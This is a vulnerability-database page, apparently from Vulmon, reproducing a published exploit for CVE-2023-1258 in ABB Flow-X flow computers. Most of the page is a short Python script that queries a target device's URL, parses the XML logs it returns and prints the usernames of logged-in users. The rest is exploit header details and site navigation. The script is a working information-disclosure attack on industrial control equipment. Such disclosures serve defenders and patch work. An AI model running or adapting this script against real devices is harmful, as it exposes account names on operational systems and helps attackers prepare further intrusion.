Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2023-1258

Publish Date: 20 Jul 2023

Source

                							

                # Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258


#!/usr/bin/python
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml
import requests

# Set the request parameter
url = sys.argv[1]


def dump_users():
    response = requests.get(url)

    # Check for HTTP codes other than 200
    if response.status_code != 200:
      print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
      exit()

    # Decode the xml response into dictionary and use the data
    data = response.text
    soup = BS(data, features="xml")
    logs = soup.find_all("log")
    for log in logs:
      test = re.search('User (.*?) logged in',str(log))
      if test:
        print(test.group(0))
def main():
  dump_users()


if __name__ == '__main__':
    main()
            

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

ABB FlowX 4.00 Information Disclosure

Vulmon Search

About

Products

Connect